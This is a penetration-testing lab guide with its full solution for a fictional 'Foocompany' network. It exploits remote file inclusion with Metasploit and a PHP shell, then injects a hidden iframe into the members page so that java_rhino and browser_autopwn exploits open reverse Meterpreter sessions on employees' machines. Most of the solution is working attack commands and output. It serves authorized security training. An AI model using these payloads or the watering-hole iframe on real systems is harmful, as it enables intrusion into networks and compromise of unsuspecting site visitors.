
HERA

LAB ID: 6

BLIND PENETRATION TEST


[Blind Penetration Test] LAB ID: 6

1. LAB
You are a penetration tester and you are asked to perform a penetration
test against Foocompany. The organization relies upon Foohosting inc. to
host a dedicated web server on which several organizations' websites
are present. Your goal is to obtain access to the internal target
organization network, meaning you have to exploit one or more internal
machines. You know that the organization website offers a members
area that is browsed daily by the employees of the organization to
perform different tasks.

This is what the client organization defined as the scope of the tests:

- WEB SERVER IP ADDRESS: 10.100.0.100
- ANY CORPORATE PRIVATE ADDRESS IN THE RANGE: 192.168.78.0/24

The following image summarizes the Lab environment

eLearnSecurity s.r.l. © 2012 | H E R A 2


2. GOALS
- Obtain access to one or more machines of the organization network

3. WHAT YOU WILL LEARN
- You will know at the end

4. RECOMMENDED TOOLS
- Metasploit

5. IMPORTANT NOTE BEFORE STARTING

In this lab there are no tasks to follow. You are completely free to
move in the lab environment, choose your next steps, and use your own
exploits, skills and preferred tools. Moreover, in this lab you
also have to use web application knowledge and exploitation.

Further information:

- Lab machines (the web server and the internal organization machines)
  are not connected to the internet.
- In order to connect to the target organization website you have to
  add the following two static entries to your hosts file:
  - 10.100.0.100 foocompany.com
  - 10.100.0.100 members.foocompany.com

------------------------------------------ hosts path ---------------------------------------
- Windows: C:\Windows\System32\drivers\etc\hosts
- Linux: /etc/hosts
--------------------------------------------------------------------------------------------------

The lab solutions follow. Be sure to read them only when you have
finished your lab, or if you are stuck.


Solutions


Task 1. Web server

Since the web server is our only route to the target machines (the
internal network), it is the natural place to start.

Our /etc/hosts file, with the two entries that let us connect to the
organization website:

10.100.0.100 foocompany.com
10.100.0.100 members.foocompany.com

With those two lines in place, we are able to browse the organization
website.


Browsing the website, the members area (members.foocompany.com) shows a
possible vulnerability to exploit. The page is loaded through a 'pag'
parameter whose value is a file name: index.php in the members area
takes the page to display from the query string.

Indeed, if we request index.php?pag=announcement.txt, we are able to read
the announcement.txt file.

What we can do now is check what happens if we insert a URL instead of a
file name. To check whether this works, we can simply insert the
organization website URL (http://foocompany.com/) as the value of 'pag':


As you can see, the page (foocompany.com) has been included. This means
that the server is vulnerable to RFI (Remote File Inclusion): the value of
'pag' reaches a PHP include, and the PHP configuration allows URLs there
(allow_url_fopen and allow_url_include enabled), so the server fetches
whatever we name and executes it as PHP.

With this information we should be able to exploit the server. We can do
so in different ways: with Metasploit and with PHP shells.
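The include pattern that produces this behaviour, beside an allowlist version that closes it, as an added example. This is not the lab's index.php (the page does not show its source); the page names, the pages/ directory and the $pages map are assumptions of the example.

```php
<?php
// Added example, not the lab's index.php (the page does not show its source).
// The page keys, the 'pages/' directory and the $pages map are assumptions.

// Vulnerable pattern: whatever arrives in ?pag= goes straight to include().
// With allow_url_include=On, ?pag=http://attacker/shell.txt makes the web
// server fetch and execute attacker-controlled PHP (RFI); even with it Off,
// ?pag=../../../../etc/passwd still reads local files (LFI).
function show_page_vulnerable($pag)
{
    include $pag;
}

// Hardened pattern: the request carries only a key into a fixed map, so no
// user-controlled string ever reaches include() or the filesystem API.
function resolve_page($pag)
{
    $pages = array(
        'home'         => 'pages/home.php',
        'announcement' => 'pages/announcement.txt',
    );
    if (!is_string($pag) || !array_key_exists($pag, $pages)) {
        return null;                       // unknown key: refuse, do not guess
    }
    return dirname(__FILE__) . '/' . $pages[$pag];
}

$path = resolve_page(isset($_GET['pag']) ? $_GET['pag'] : null);
if ($path === null) {
    header('HTTP/1.0 404 Not Found');
    exit('unknown page');
}
// Static text is sent with readfile(); only allowlisted .php pages are included.
if (substr($path, -4) === '.php') {
    include $path;
} else {
    header('Content-Type: text/plain');
    readfile($path);
}
```

On a box you already control, `php -i | grep allow_url` shows whether allow_url_include is on; it defaults to Off since PHP 5.2, so seeing a remote URL included is a configuration finding worth reporting on its own, separate from the unsanitized include.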


1) METASPLOIT
Metasploit offers a specific module that exploits RFI,
exploit/unix/webapp/php_include. We need to set the target server
address, the URI vulnerable to RFI and the payload to use.

//Select the module to use
msf > use exploit/unix/webapp/php_include
//set the remote host, meaning the target server
msf exploit(php_include) > set RHOST 10.100.0.100
RHOST => 10.100.0.100
//The URI to request, with the include parameter changed to XXpathXX
msf exploit(php_include) > set PHPURI /index.php?pag=XXpathXX
PHPURI => /index.php?pag=XXpathXX
//The local host to listen on
msf exploit(php_include) > set SRVHOST 172.16.5.34
SRVHOST => 172.16.5.34
//The payload to use
msf exploit(php_include) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
//The local host (our ip address)
msf exploit(php_include) > set LHOST 172.16.5.34
LHOST => 172.16.5.34
msf exploit(php_include) > exploit

[*] Started reverse handler on 172.16.5.34:4444
[*] Using URL: http://172.16.5.34/Tb44IeIC5pyIvC
[*] PHP include server started.
[*] Sending stage (38791 bytes) to 10.100.0.100
[*] Meterpreter session 1 opened (172.16.5.34:4444 -> 10.100.0.100:49241)
at 2012-04-11 17:53:20 +0200

meterpreter >

Metasploit starts a local web server hosting the PHP payload at
/Tb44IeIC5pyIvC, then requests the vulnerable page with that URL in place
of XXpathXX, triggering the include. The included code starts the
Meterpreter reverse TCP session back to LHOST. If the vulnerable
index.php is only served under the members.foocompany.com name (a virtual
host on 10.100.0.100), also set VHOST members.foocompany.com so the
request carries the right Host header.


2) SHELL
An easier way to exploit the server is by using a PHP shell.
Note: lab machines are not connected to the internet, so we have to host
the shell ourselves.

We create our shell and store it in the folder /var/www on the attacker
machine, then start the Apache service, either by clicking "apache start"
in Application->Backtrack->Services->HTTPD or with "service apache2 start"
from a terminal.

(Screenshots: the shell file, and starting the Apache service)


Now we have to change the value of the 'pag' parameter in the URI so that
the server includes and runs our shell (http://OUR_IP_ADDRESS/shell.txt).
The file is served as .txt on purpose: our Apache sends it as plain text
instead of executing it, and it is the target's include that runs it.
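A minimal shell.txt of the kind described above, as an added example; it is not the shell used in the lab, which the page does not show. The 'key' parameter and its value are assumptions of this example: without some gate, anyone who notices the included URL in the target's logs could run commands on the client's server through it.

```php
<?php
// Added example of a minimal shell.txt, not the one used in the lab (the page
// does not show it). Stored as /var/www/shell.txt on the attacker machine so
// our Apache sends it as plain text; the target's include() executes it.
// $_GET here is the *target's* request, e.g.
//   /index.php?pag=http://172.16.5.34/shell.txt&key=lab6-only&cmd=id
// The 'key' check is an assumption of this example, added so that only we can
// drive the shell for the duration of the engagement.
$key = 'lab6-only';                                   // change before use
if (!isset($_GET['key']) || $_GET['key'] !== $key) {
    return;                                           // wrong key: do nothing
}
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
$out = shell_exec($cmd . ' 2>&1');                    // capture stderr as well
echo '<pre>', htmlspecialchars((string) $out, ENT_QUOTES, 'UTF-8'), "</pre>\n";
```

The `&key=...&cmd=...` part belongs to the request for index.php, not to the URL fetched from our Apache, which is why the included file can read it from $_GET. Remove the file from the target's reach (and from /var/www) when the engagement ends.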

Task 2. Info gathering

Now that we control the server we can start searching for useful
information that helps us reach our goal. Since the server is the only
connection between us and the organization network (the members area is
browsed by organization employees), we have to think about how we can
use the server to gain access to the organization machines.

Searching the web server folders, we find a file named 'logs.txt' that
could reveal useful information. Opening it, we see a history of clients
that have connected to the members area, along with some other
information.


The logs.txt file contains several warnings about client login attempts,
including each client's browser user agent and Java version. At least two
clients (192.168.78.25 and 192.168.78.5) have an out-of-date Java
installed.

Searching for Java vulnerabilities, we find that both Java versions are
vulnerable to the Java Rhino exploit (Rhino Script Engine remote code
execution, CVE-2011-3544, fixed in Java 6 Update 29 and Java 7 Update 1).
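The same triage done over the log file instead of by eye, as an added example (not the lab's logs.txt or tooling). The page does not reproduce the log layout or the clients' Java versions, so the line format, timestamps, user agents and versions below are constructed; only the two client IPs come from the lab text. The fix versions are those of the CVE-2011-3544 advisory.

```php
<?php
// Added example (not the lab's logs.txt or tooling): pick out clients whose
// Java plugin predates the fix for the Rhino script-engine bug used by
// exploit/multi/browser/java_rhino (CVE-2011-3544: fixed in Java 6 Update 29
// and Java 7 Update 1). The log line layout, timestamps, user agents and Java
// versions below are constructed for this example; only the two client IPs
// 192.168.78.5 and 192.168.78.25 come from the lab text.
$sample_log = <<<'LOG'
[2012-04-10 08:41:12] WARNING login attempt from 192.168.78.5 agent="Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0" java="1.6.0_20"
[2012-04-10 08:43:55] WARNING login attempt from 192.168.78.25 agent="Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19" java="1.7.0"
[2012-04-10 09:02:07] WARNING login attempt from 192.168.78.40 agent="Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0" java="1.6.0_31"
[2012-04-10 09:10:30] INFO login ok from 192.168.78.41 agent="Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0" java="none"
LOG;

// true  = below the fix release for its major version
// false = at or above it
// null  = not Java 6/7: outside the advisory's affected range, check separately
function rhino_vulnerable($java)
{
    $fixed = array('1.6' => '1.6.0.29', '1.7' => '1.7.0.1');
    $v = str_replace('_', '.', $java);      // "1.6.0_20" -> "1.6.0.20"; "1.7.0" is 7u0
    if (!preg_match('/^(1\.[67])\./', $v, $m)) {
        return null;
    }
    return version_compare($v, $fixed[$m[1]], '<');
}

// Returns array(ip => java version) for every host that logged a vulnerable
// Java; a host seen several times keeps the last version it reported.
function vulnerable_clients($log)
{
    $hits = array();
    foreach (preg_split('/\r?\n/', trim($log)) as $line) {
        if (!preg_match('/from (\d{1,3}(?:\.\d{1,3}){3}) .*\bjava="([^"]+)"/', $line, $m)) {
            continue;                        // no client IP / Java field on this line
        }
        if ($m[2] !== 'none' && rhino_vulnerable($m[2]) === true) {
            $hits[$m[1]] = $m[2];
        }
    }
    return $hits;
}

foreach (vulnerable_clients($sample_log) as $ip => $java) {
    printf("%-15s Java %-9s below Rhino fix version, candidate for java_rhino\n", $ip, $java);
}
```

With the constructed input, the two hosts reported are 192.168.78.5 (1.6.0_20) and 192.168.78.25 (1.7.0); 192.168.78.40 on 1.6.0_31 is past the fix and is left out, which is the distinction that decides whether java_rhino alone is enough or browser_autopwn is worth running alongside it.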

Once again, we know that organization employees usually log into the
members area. What we can do, then, is edit the members web page to
insert one or more iframes that point to our attacker machine, and try to
exploit client vulnerabilities that way.


Task 3. Client exploitation

There are different metasploit modules that we can use to achieve this
goal.

In this case we will use both:

- auxiliary/server/browser_autopwn
- exploit/multi/browser/java_rhino

The first one serves a range of browser exploits, while the second is
specific to our environment, since both clients found in logs.txt are
vulnerable to it. The reason we also use the first one is that we do not
know whether there are other workstations vulnerable to different
exploits; we want to maximize our chances of entering the corporate
network through a client-side exploit.

Let’s see first how to configure the modules.


1) BROWSER_AUTOPWN

//Select the module to use
msf > use auxiliary/server/browser_autopwn
//The local host (our ip address)
msf auxiliary(browser_autopwn) > set LHOST 172.16.5.34
LHOST => 172.16.5.34
//The local host to listen on
msf auxiliary(browser_autopwn) > set SRVHOST 172.16.5.34
SRVHOST => 172.16.5.34
msf auxiliary(browser_autopwn) > exploit

[*] Setup
[*] Obfuscating initial javascript 2012-04-12 11:04:48 +0200
msf auxiliary(browser_autopwn) > [*] Done in 0.698111897 seconds

[*] Starting exploit modules on host 172.16.5.34...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload
generic/shell_reverse_tcp
[*] Using URL: http://172.16.5.34:8080/JAHJDnByXPQRX
[*] Starting the payload handler...
[*] Starting the payload handler...

[*] --- Done, found 24 exploit modules

[*] Using URL: http://172.16.5.34:8080/GVOsZD92MVyXx21
[*] Server started.

(Only the first of the 24 exploit modules is shown above.) This gives us
a URL to insert in the web server: the last one, the autopwn landing page
that fingerprints the visiting browser and routes it to the matching
exploits. Note that browser_autopwn runs as a background job: the prompt
returns while its exploit servers and payload handlers keep running.


2) JAVA_RHINO
In the same way as browser_autopwn, we have to set up the java_rhino
module. Note that there are two different machines vulnerable to this
exploit, and they have different OSs, so we have to set the module
properly: we leave the TARGET option at 0 (Generic) and use a Java
payload, which runs inside the JVM on either OS.

//Select the module to use
msf > use exploit/multi/browser/java_rhino
//The local host to listen on
msf exploit(java_rhino) > set SRVHOST 172.16.5.34
SRVHOST => 172.16.5.34
//The local port to listen on (8080 is already taken by browser_autopwn)
msf exploit(java_rhino) > set SRVPORT 8081
SRVPORT => 8081
//set the PAYLOAD to use (a Java payload works for both the Windows and the Linux client)
msf exploit(java_rhino) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
//The local host (our ip address)
msf exploit(java_rhino) > set LHOST 172.16.5.34
LHOST => 172.16.5.34
//The handler port: the output below shows 4567, so LPORT was moved off the default 4444 (this line is missing from the original listing)
msf exploit(java_rhino) > set LPORT 4567
LPORT => 4567
msf exploit(java_rhino) > exploit

[*] Started reverse handler on 172.16.5.34:4567
[*] Using URL: http://172.16.5.34:8081/fdos8h49dzUt851
[*] Server started.

Now we have another URL that we can use to exploit the target
organization's corporate network.

What we have to do now is inject a hidden iframe into the members area
home page, so that our malicious page is loaded each time someone visits
the page.


To do this, we use our shell or our Metasploit session (download the file
with meterpreter's download command, edit it, and upload it back with
upload; keep the original copy so the page can be restored at the end of
the engagement).

In this case we will use only the java_rhino exploit, so we add the
following code to index.php:

-------------------------------------iframe in index.php-----------------------------------
<iframe src="http://172.16.5.34:8081/fdos8h49dzUt851" width="1" height="1" style="visibility:hidden; position:absolute"></iframe>
--------------------------------------------------------------------------------------------------

where http://172.16.5.34:8081/fdos8h49dzUt851 is the URL created by
Metasploit.


This way, every time someone opens members.foocompany.com, the browser
automatically requests our exploit URL. If the browser or any of its
installed plugins is vulnerable, we obtain a Meterpreter session.

Once the page has been saved, we just have to wait for one of the
vulnerable clients to visit the members page. After a few minutes the
first session is created (IP: 192.168.78.5):

msf exploit(java_rhino) >
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49874...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49877...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49878...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49879...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.5:49880...
[*] Sending stage (28541 bytes) to 192.168.78.5
[*] Meterpreter session 2 opened (172.16.5.34:4567 -> 192.168.78.5:49881)
at 2012-04-12 12:56:27 +0200


Right after the previous machine, another one is exploited
(IP: 192.168.78.25):

msf exploit(java_rhino) >
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44055...
[*] Sending Applet.jar to 192.168.78.25:44056...
[*] Sending Applet.jar to 192.168.78.25:44056...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44057...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44058...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44059...
[*] Java Applet Rhino Script Engine Remote Code Execution handling
request from 192.168.78.25:44060...
[*] Sending stage (28541 bytes) to 192.168.78.25
[*] Meterpreter session 3 opened (172.16.5.34:4567 ->
192.168.78.25:58011) at 2012-04-12 12:56:53 +0200

From here, post-exploitation of the two compromised clients and further
movement inside the in-scope 192.168.78.0/24 network can begin.
